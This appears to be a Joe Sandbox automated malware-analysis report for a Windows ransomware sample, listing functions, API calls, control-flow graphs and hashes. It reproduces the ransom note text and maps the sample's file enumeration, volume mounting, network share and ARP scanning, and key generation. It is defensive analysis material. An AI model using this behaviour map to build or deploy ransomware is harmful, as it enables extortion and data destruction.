                                  • Opcode Fuzzy Hash: 323a7a6217906f4f7bf4e60a01e1b3e32ae939bad52f43dd7c210a9587ef6c60
                                  • Instruction Fuzzy Hash: 01812060D082C8DDEB11DBE4DC48BDFBFB9AF16709F08419DD48166282CB7A4649CB75
                                  Function 005C812D Relevance: 56.3, APIs: 12, Strings: 20, Instructions: 333stringsleepfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1052 5c812d-5c814a call 5c5c2d 1055 5c8150-5c815b 1052->1055 1056 5c85e3-5c85eb 1052->1056 1057 5c8160-5c8162 1055->1057 1058 5c819c-5c81a3 1057->1058 1059 5c8164-5c8170 call 5c7277 1057->1059 1060 5c8569-5c856b 1058->1060 1061 5c81a9-5c81b2 1058->1061 1069 5c8196 1059->1069 1070 5c8172-5c817e call 5c7277 1059->1070 1063 5c856f-5c857c Sleep 1060->1063 1064 5c81b6-5c81c5 call 5c7234 1061->1064 1067 5c856d 1063->1067 1068 5c857e-5c8585 1063->1068 1077 5c855f-5c8564 1064->1077 1078 5c81cb-5c81dd InterlockedIncrement 1064->1078 1067->1063 1072 5c85dc-5c85de call 5c5cd2 1068->1072 1073 5c8587-5c8592 1068->1073 1075 5c8198 1069->1075 1070->1069 1084 5c8180-5c818f call 5c7277 1070->1084 1072->1056 1073->1057 1079 5c8598-5c85a8 call 5c73f4 1073->1079 1075->1058 1077->1060 1081 5c81df-5c81e6 1078->1081 1082 5c820a-5c8227 1078->1082 1079->1057 1090 5c85ae-5c85bb call 5c73f4 1079->1090 1081->1082 1085 5c81e8-5c8203 call 5ca05f call 5c9fa1 1081->1085 1088 5c822c-5c823e 1082->1088 1084->1069 1095 5c8191-5c8194 1084->1095 1102 5c8208-5c8209 1085->1102 1088->1088 1092 5c8240-5c8265 call 5ca05f FindFirstFileW 1088->1092 1090->1057 1103 5c85c1-5c85ce call 5c73f4 1090->1103 1100 5c8529-5c853b call 5c5cd2 InterlockedDecrement 1092->1100 1101 5c826b-5c8273 1092->1101 1095->1075 1115 5c8545-5c854c 1100->1115 1104 5c8279-5c827e 1101->1104 1105 5c8501-5c8508 1101->1105 1102->1082 1103->1057 1117 5c85d4-5c85d6 1103->1117 1108 5c8284-5c82b1 1104->1108 1109 5c8397-5c8418 1104->1109 1110 5c851e-5c8525 FindClose 1105->1110 1111 5c850a-5c8518 FindNextFileW 1105->1111 1114 5c82b5-5c82c9 1108->1114 1116 5c841d-5c842f 1109->1116 1110->1100 1111->1101 1111->1110 1114->1114 1118 5c82cb-5c82e7 lstrcmpW 1114->1118 1119 5c853d-5c853f Sleep 1115->1119 1120 5c854e-5c8559 1115->1120 1116->1116 1121 5c8431-5c844d lstrcmpW 1116->1121 1117->1059 1117->1072 1118->1105 1123 5c82ed-5c8330 1118->1123 1119->1115 1120->1064 1120->1077 1121->1105 1122 5c8453-5c8464 lstrcmpW 1121->1122 1122->1105 1124 5c846a-5c8483 call 5c10f6 1122->1124 1125 5c8334-5c8348 1123->1125 1124->1105 1130 5c8485-5c848b 1124->1130 1125->1125 1127 5c834a-5c8360 lstrcmpW 1125->1127 1127->1105 1129 5c8366-5c836d 1127->1129 1131 5c838e-5c8392 1129->1131 1132 5c836f-5c8388 call 5c10f6 1129->1132 1133 5c848d-5c8498 call 5ca04f 1130->1133 1134 5c84c7 1130->1134 1136 5c84cc-5c84e6 call 5ca05f call 5c7183 1131->1136 1132->1105 1132->1131 1133->1134 1143 5c849a-5c84a0 1133->1143 1134->1136 1144 5c84eb-5c84ee 1136->1144 1145 5c84a9-5c84c5 call 5c10f6 1143->1145 1146 5c84a2-5c84a5 1143->1146 1147 5c84f8-5c84ff 1144->1147 1145->1105 1145->1134 1146->1143 1148 5c84a7 1146->1148 1147->1105 1150 5c84f0-5c84f2 Sleep 1147->1150 1148->1134 1150->1147
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • InterlockedIncrement.KERNEL32(006D9A3C), ref: 005C81D0
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 005C825A
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C82E3
                                    • Part of subcall function 005C7277: EnterCriticalSection.KERNEL32(012FFC04,00000000,006D9874,006D9A1C,?,?,?,005C816D,0000000A), ref: 005C728D
                                    • Part of subcall function 005C7277: lstrcmpW.KERNEL32(?,00000005,?,?,?,005C816D,0000000A), ref: 005C72D4
                                    • Part of subcall function 005C7277: LeaveCriticalSection.KERNEL32(012FFC04,?,?,?,005C816D,0000000A), ref: 005C73E7
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C835C
                                  • lstrcmpW.KERNEL32(?,00000070), ref: 005C8449
                                  • lstrcmpW.KERNEL32(?,README.TXT), ref: 005C8460
                                  • Sleep.KERNEL32(0000000A), ref: 005C84F2
                                  • FindNextFileW.KERNEL32(00000000,00000400), ref: 005C8510
                                  • FindClose.KERNEL32(00000000), ref: 005C851F
                                  • InterlockedDecrement.KERNEL32(006D9A3C), ref: 005C8535
                                  • Sleep.KERNEL32(00000001), ref: 005C856F
                                    • Part of subcall function 005C7277: lstrlenW.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C7313
                                    • Part of subcall function 005C7277: lstrcpyW.KERNEL32(00000000,006CAB48,?,?,?,005C816D,0000000A), ref: 005C7393
                                    • Part of subcall function 005C7277: lstrcatW.KERNEL32(00000000,?,?,?,?,005C816D,0000000A), ref: 005C739D
                                    • Part of subcall function 005C7277: EnterCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73A4
                                    • Part of subcall function 005C7277: LeaveCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73BF
                                  • Sleep.KERNEL32(0000000A), ref: 005C853F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcmp$CriticalSection$FindSleep$EnterFileInterlockedLeave$AllocateCloseDecrementFirstHeapIncrementNextlstrcatlstrcpylstrlen
                                  • String ID: .$1$:$README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$Z$`$`$a$d$f$p$p$p$p$q$r$u$x$y
                                  • API String ID: 2436953853-1016503251
                                  • Opcode ID: e0fe384b3ed29cd9872792ad0c0d65d464665aa37f1a7b8f0768277f9e318fcc
                                  • Instruction ID: 6eb88b26aebbcbb8ed8d3a5ff55543691af6f22ed82b21a4ec4e2316497cd609
                                  • Opcode Fuzzy Hash: e0fe384b3ed29cd9872792ad0c0d65d464665aa37f1a7b8f0768277f9e318fcc
                                  • Instruction Fuzzy Hash: EFD1BF3060C3C19EDB11DB688848B6BBFE56BD6308F08585DF5C48B292DBB5D949CB63
                                  Function 005CB8A2 Relevance: 45.7, APIs: 8, Strings: 18, Instructions: 230stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1152 5cb8a2-5cb8bb call 5c5c2d 1155 5cbb5b-5cbb5e 1152->1155 1156 5cb8c1-5cb90a 1152->1156 1157 5cb90d-5cb920 1156->1157 1157->1157 1158 5cb922-5cb931 lstrcpyW 1157->1158 1159 5cb933-5cb940 GetDriveTypeW 1158->1159 1160 5cb94b-5cb950 1159->1160 1161 5cb942-5cb94a 1159->1161 1160->1159 1162 5cb952-5cb960 call 5c5c2d 1160->1162 1161->1160 1165 5cb966-5cb972 FindFirstVolumeW 1162->1165 1166 5cbb53-5cbb5a call 5c5cd2 1162->1166 1167 5cb975-5cb977 1165->1167 1166->1155 1169 5cb97d-5cb9a9 call 5c5c85 GetVolumePathNamesForVolumeNameW 1167->1169 1170 5cbb43-5cbb4e FindVolumeClose call 5c5cd2 1167->1170 1175 5cb9ab-5cb9bb lstrlenW 1169->1175 1176 5cb9c1-5cba60 SetVolumeMountPointW 1169->1176 1170->1166 1175->1176 1178 5cbb2c-5cbb3d FindNextVolumeW 1175->1178 1177 5cba62-5cba6b 1176->1177 1177->1177 1179 5cba6d-5cbafe 1177->1179 1178->1167 1178->1170 1180 5cbb01-5cbb14 1179->1180 1180->1180 1181 5cbb16-5cbb24 call 5d1c06 1180->1181 1183 5cbb29 1181->1183 1183->1178
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrcpyW.KERNEL32(00000000,?,00000001,00000000,00000000), ref: 005CB92B
                                  • GetDriveTypeW.KERNEL32(00000000), ref: 005CB937
                                  • FindFirstVolumeW.KERNEL32(00000000,00008000), ref: 005CB96C
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(00000000,?,00000080,00000000), ref: 005CB9A1
                                  • lstrlenW.KERNEL32(?,?,00000080,00000000), ref: 005CB9B2
                                  • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 005CB9CF
                                  • FindNextVolumeW.KERNEL32(?,00000000,00008000,?,?,00000080,00000000), ref: 005CBB35
                                  • FindVolumeClose.KERNEL32(?), ref: 005CBB46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Volume$Find$AllocateCloseDriveFirstHeapMountNameNamesNextPathPointTypelstrcpylstrlen
                                  • String ID: %$%$%$*$*$2$?$?$C$G$[$j$q$r$t$x$x$z
                                  • API String ID: 3806773137-3898048949
                                  • Opcode ID: 198c028f6fe19279129e9df24aa1e17b3ae16e2527f9397516bab1cd273ae72e
                                  • Instruction ID: 9ddbf74ae5f13a73591c466988ae1fa445532538424382d6bd71dd14f69ea636
                                  • Opcode Fuzzy Hash: 198c028f6fe19279129e9df24aa1e17b3ae16e2527f9397516bab1cd273ae72e
                                  • Instruction Fuzzy Hash: 8DA12121D082C99EEF11CBE8D889BDFBFB5AF26308F144059D4807B243D7655A0ACB76
                                  Function 005C67B6 Relevance: 38.7, APIs: 11, Strings: 11, Instructions: 219stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1184 5c67b6-5c67d4 1185 5c67d7-5c6804 EnterCriticalSection NetShareEnum LeaveCriticalSection 1184->1185 1186 5c6806-5c680c 1185->1186 1187 5c6813-5c681c 1185->1187 1186->1185 1188 5c680e 1186->1188 1189 5c6a3e-5c6a3f NetApiBufferFree 1187->1189 1190 5c6822-5c6827 1187->1190 1191 5c6a45-5c6a49 1188->1191 1189->1191 1192 5c6829-5c682e 1190->1192 1193 5c683b-5c6876 1190->1193 1192->1193 1194 5c6830-5c6835 1192->1194 1195 5c6878-5c6881 1193->1195 1194->1193 1196 5c6a2e-5c6a35 1194->1196 1195->1195 1197 5c6883-5c6891 lstrcmpiW 1195->1197 1196->1190 1198 5c6a3b 1196->1198 1197->1196 1199 5c6897-5c68a5 call 5c5c2d 1197->1199 1198->1189 1199->1196 1202 5c68ab-5c68d7 lstrcpyW 1199->1202 1203 5c68db-5c68ec 1202->1203 1203->1203 1204 5c68ee-5c6903 StrCmpNW 1203->1204 1205 5c6905-5c693c 1204->1205 1206 5c6963-5c6992 lstrcatW 1204->1206 1207 5c693f-5c6952 1205->1207 1208 5c6995-5c69a8 1206->1208 1207->1207 1209 5c6954-5c695d lstrcatW 1207->1209 1208->1208 1210 5c69aa-5c69da lstrcatW * 2 call 5c7183 1208->1210 1209->1206 1213 5c69dc-5c6a01 1210->1213 1214 5c6a27-5c6a29 call 5c5cd2 1210->1214 1216 5c6a04-5c6a17 1213->1216 1214->1196 1216->1216 1217 5c6a19-5c6a22 call 5d1b5f 1216->1217 1217->1214
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D95CC,?,00000000,006D95B4), ref: 005C67D8
                                  • NetShareEnum.NETAPI32(00000004,00000001,?,000000FF,?,?,?,?,00000000,006D95B4), ref: 005C67F3
                                  • LeaveCriticalSection.KERNEL32(006D95CC,?,00000000,006D95B4), ref: 005C67FC
                                  • lstrcmpiW.KERNEL32(?,00000002,?,00000000,006D95B4), ref: 005C6889
                                  • lstrcpyW.KERNEL32(00000000,006CAB48,?,00000000,006D95B4), ref: 005C68B1
                                  • StrCmpNW.SHLWAPI(?,h4h44,00000002,?,00000000,006D95B4), ref: 005C68FB
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C695D
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C6967
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C69B3
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C69BC
                                  • NetApiBufferFree.NETAPI32(?,?,00000000,006D95B4), ref: 005C6A3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcat$CriticalSection$BufferEnterEnumFreeLeaveSharelstrcmpilstrcpy
                                  • String ID: &$4h4$C$F$K$O$P$T$h4h44$l$m
                                  • API String ID: 104611630-3898978471
                                  • Opcode ID: f1a1ba8302f61a8cad888c7e8115d582c1e9370ee7c424a3930f26bbd8f66f3e
                                  • Instruction ID: 2ea94ab44e5cdc520917e93d43114efd67eca4d38c00a88bc26c5755e97c5a11
                                  • Opcode Fuzzy Hash: f1a1ba8302f61a8cad888c7e8115d582c1e9370ee7c424a3930f26bbd8f66f3e
                                  • Instruction Fuzzy Hash: 85919170E04288AFDF11CBE8D888BEEBFF6AF16304F185059E490B7242C7754A46CB61
                                  Function 005C5D50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 213networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 005C5D6D
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 005C5D8F
                                  • inet_ntoa.WS2_32 ref: 005C5DBE
                                  • WSAGetLastError.WS2_32 ref: 005C5DC6
                                  • StrStrIA.KERNELBASE(00000000,?), ref: 005C5E20
                                  • StrStrIA.SHLWAPI(00000000,OGLPOHFP), ref: 005C5E73
                                  • StrStrIA.SHLWAPI(00000000,:8), ref: 005C5EA0
                                  • StrStrIA.SHLWAPI(00000000,?), ref: 005C5EFF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Table$AllocateErrorHeapLastinet_ntoa
                                  • String ID: 2$;:8$OGLPOHFP$Q$~OO
                                  • API String ID: 3840220401-3501781245
                                  • Opcode ID: 22c99a1131cf53acee8d5622a0d42e96ad5b7d2107034c7b3e9868cec99da0f0
                                  • Instruction ID: 6c8367edee6b39706507ffce9a4dd33322eeddca500eae3d61d86ce30047a8df
                                  • Opcode Fuzzy Hash: 22c99a1131cf53acee8d5622a0d42e96ad5b7d2107034c7b3e9868cec99da0f0
                                  • Instruction Fuzzy Hash: 0181BE70D056899FDB16CFE8D494AEEFFB5BF56304F18409DE481AB242D3306A46CB20
                                  Function 005F4200 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,005E9102), ref: 005F4225
                                  • CryptGenRandom.ADVAPI32(00000040,00000040,?), ref: 005F423A
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005F4270
                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,Intel Hardware Cryptographic Service Provider,00000016,F0000040), ref: 005F4289
                                  • CryptGenRandom.ADVAPI32(00000040,00000040,?), ref: 005F429E
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005F42D4
                                  • GlobalMemoryStatus.KERNEL32(?), ref: 005F42E4
                                  • GetCurrentProcessId.KERNEL32 ref: 005F4310
                                  Strings
                                  • Intel Hardware Cryptographic Service Provider, xrefs: 005F427D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease$CurrentGlobalMemoryProcessStatus
                                  • String ID: Intel Hardware Cryptographic Service Provider
                                  • API String ID: 2886239813-3323058758
                                  • Opcode ID: 6257191bdecfd8e6fd3338331d99efb64198641dfbe6e8ca28821a60e1cee59b
                                  • Instruction ID: de7e568de2ddb88aa0b7b9d93b34bf4bdb03ada268a52541d845ba6776d0df82
                                  • Opcode Fuzzy Hash: 6257191bdecfd8e6fd3338331d99efb64198641dfbe6e8ca28821a60e1cee59b
                                  • Instruction Fuzzy Hash: D331E474644305BBE750EF64CC0AF5B7BAEFF85700F00091AF648EA1A1EB74D5858B56
                                  Function 005CA715 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,00000000,?,?,005C59BB), ref: 005CA72A
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000000,?,?,005C59BB), ref: 005CA752
                                  • lstrlenW.KERNEL32(00000000,?,?,005C59BB), ref: 005CA757
                                  • lstrlenW.KERNEL32(-00000002,?,?,?,?,?,005C59BB), ref: 005CA7C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: DriveLogicalStringslstrlen$AllocateHeap
                                  • String ID: ($($(
                                  • API String ID: 3376261275-3938514357
                                  • Opcode ID: 8557ed3b40505f1c367a35ab7bad5bc10abdaebb8c5357289d2b61159d4940ee
                                  • Instruction ID: b5c8eac9882f431fa64b96d9ea84e9816f7c50f9e0b7ab5c09cbbabcfd9bd44f
                                  • Opcode Fuzzy Hash: 8557ed3b40505f1c367a35ab7bad5bc10abdaebb8c5357289d2b61159d4940ee
                                  • Instruction Fuzzy Hash: 77216835A00348ABDB019BE98849BDEBFB5BF92700F18809CD90077341DF748F098391
                                  Function 005C618D Relevance: 9.1, APIs: 6, Instructions: 100memorynetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00000028,?,00000000,00000000,?,005C64D5), ref: 005C61B5
                                  • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 005C61DC
                                  • GlobalFree.KERNEL32(00000000), ref: 005C61EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Global$AllocFreeSocket
                                  • String ID:
                                  • API String ID: 1597759509-0
                                  • Opcode ID: 100da494104b915b7654b7d0dbfd90ad2069e5f672eb51583e5ea3d0727044e5
                                  • Instruction ID: 668dc24a652116e846706c299e0b60935cf51d20cbd3f580d4cbeed38c701984
                                  • Opcode Fuzzy Hash: 100da494104b915b7654b7d0dbfd90ad2069e5f672eb51583e5ea3d0727044e5
                                  • Instruction Fuzzy Hash: 3531AF75A41301AFDB21CFA4EC45F66BBF9BF04711F10462EE552EB2A1D371AA04CBA0
                                  Function 005CA48C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,?,00000000), ref: 005CA590
                                  • Module32FirstW.KERNEL32(00000000,00000428), ref: 005CA5A6
                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 005CA5AF
                                  • StrStrIW.SHLWAPI(?,C:\Windows,?,00000000), ref: 005CA5C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CloseCreateFirstHandleModule32SnapshotToolhelp32
                                  • String ID: C:\Windows
                                  • API String ID: 994909291-2661751657
                                  • Opcode ID: c1c51f834be1985126018a4bb8f7fc828af7a28ad30715c91d9f55ffda253831
                                  • Instruction ID: 4eaf158c7cb9e1ec5048e66bcda5e47e5cc97af0b372de61526d00f59fa37353
                                  • Opcode Fuzzy Hash: c1c51f834be1985126018a4bb8f7fc828af7a28ad30715c91d9f55ffda253831
                                  • Instruction Fuzzy Hash: D4411671E00219BFDF109BE0DC49EEEBF7AFB44744F14416AE506E6150E7709A85CB61
                                  Function 005C6C41 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,00000000,?,00000001,00000000,?,?,?,?,?,?,?,005C6DB4,?,?,00000000), ref: 005C6C56
                                  • OpenProcessToken.ADVAPI32(00000000,?,00000001,00000000,?,?,?,?,?,?,?,005C6DB4,?,?,00000000), ref: 005C6C5D
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000005,?), ref: 005C6C74
                                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,00000001,00000010,?,?,?,00000001,00000000), ref: 005C6C9D
                                  • CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 005C6CA8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
